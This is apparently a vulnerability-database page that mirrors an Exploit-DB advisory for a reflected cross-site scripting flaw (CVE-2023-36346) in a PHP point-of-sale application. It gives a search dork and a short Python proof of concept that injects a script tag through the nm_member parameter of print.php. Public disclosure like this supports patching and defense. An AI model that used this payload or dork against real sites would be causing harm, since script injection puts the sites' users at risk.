Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
🗓️ 03 Jul 2023 00:00:00Reported by Amirhossein BahramizadehType
exploitdb🔗 www.exploit-db.com👁 196 Views
| Reporter | Title | Published | Views | Family All 14 |
|---|---|---|---|---|
| Sales of Cashier Goods v1.0 - Cross Site Scripting Exploit | 4 Jul 202300:00 | – | zdt | |
| CVE-2023-36346 | 23 Jun 202320:15 | – | attackerkb | |
| POS Codekop 跨站脚本漏洞 | 23 Jun 202300:00 | – | cnnvd | |
| CVE-2023-36346 | 23 Jun 202300:00 | – | cve | |
| CVE-2023-36346 | 23 Jun 202300:00 | – | cvelist | |
| EUVD-2023-40314 | 23 Jun 202300:00 | – | euvd | |
| POS Codekop v2.0 - Cross Site Scripting | 4 Aug 202615:05 | – | nuclei | |
| CVE-2023-36346 | 23 Jun 202320:15 | – | nvd | |
| CVE-2023-36346 | 23 Jun 202320:15 | – | osv | |
| Sales Of Cashier Goods 1.0 Cross Site Scripting | 3 Jul 202300:00 | – | packetstorm |
10
# Exploit Title: Sales of Cashier Goods v1.0 - Cross Site Scripting (XSS)
# Date: 2023-06-23
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /print.php?nm_member=
# Vendor Homepage: https://www.codekop.com/products/source-code-aplikasi-pos-penjualan-barang-kasir-dengan-php-mysql-3.html
# Tested on: Windows/Linux
# CVE : CVE-2023-36346
import requests
import urllib.parse
# Set the target URL and payload
url = "http://example.com/print.php"
payload = "<script>alert('XSS')</script>"
# Encode the payload for URL inclusion
payload = urllib.parse.quote(payload)
# Build the request parameters
params = {
"nm_member": payload
}
# Send the request and print the response
response = requests.get(url, params=params)
print(response.text)Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
03 Jul 2023 00:00Current
6.2Medium risk
Vulners AI Score6.2
CVSS 3.16.1
EPSS0.05295
SSVC